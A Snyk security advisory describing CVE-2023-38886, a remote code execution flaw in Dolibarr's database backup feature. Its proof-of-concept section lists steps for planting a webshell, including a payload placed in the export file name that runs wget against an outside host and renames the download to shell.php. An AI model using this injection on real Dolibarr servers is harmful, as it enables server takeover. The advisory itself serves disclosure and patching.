Remote Code Execution (RCE) Affecting dolibarr/dolibarr package, versions >=0.0.0


Severity

Recommended
0.0
critical
0
10

CVSS assessment made by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of concept
EPSS
0.48% (77th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

Snyk Learn

Learn about Remote Code Execution (RCE) vulnerabilities in an interactive lesson.

Start learning
  • Snyk IDSNYK-PHP-DOLIBARRDOLIBARR-5910188
  • published20 Sept 2023
  • disclosed20 Sept 2023
  • creditBELABED Skander

Introduced: 20 Sep 2023

CVE-2023-38886  (opens in a new tab)
CWE-94  (opens in a new tab)

How to fix?

A fix was pushed into the master branch but not yet published.

Overview

dolibarr/dolibarr is a modern and easy to use web software to manage your business.

Affected versions of this package are vulnerable to Remote Code Execution (RCE) via the dumpDatabase function due to missing input sanitisation, allowing an attacker to execute arbitrary code via a crafted command/script.

Note: This is only exploitable if the attacker has administrator privileges.

PoC

  1. Add a new file named index.html containing a webshell.

  2. Expose the newly created file on the root folder of a web server.

  3. Go to the backup feature on Dolibarr and select the “mysqldump” export method.

  4. Select the “lowmemorydump” method to hit the vulnerable section.

  5. Put the payload as the export file name (e.g. wget 192.168.1.167 && mv index.html shell.php).

  6. Click on generate backup.

Once done, the webshell should be found in htdocs/admin/tools/shell.php.

CVSS Scores

version 3.1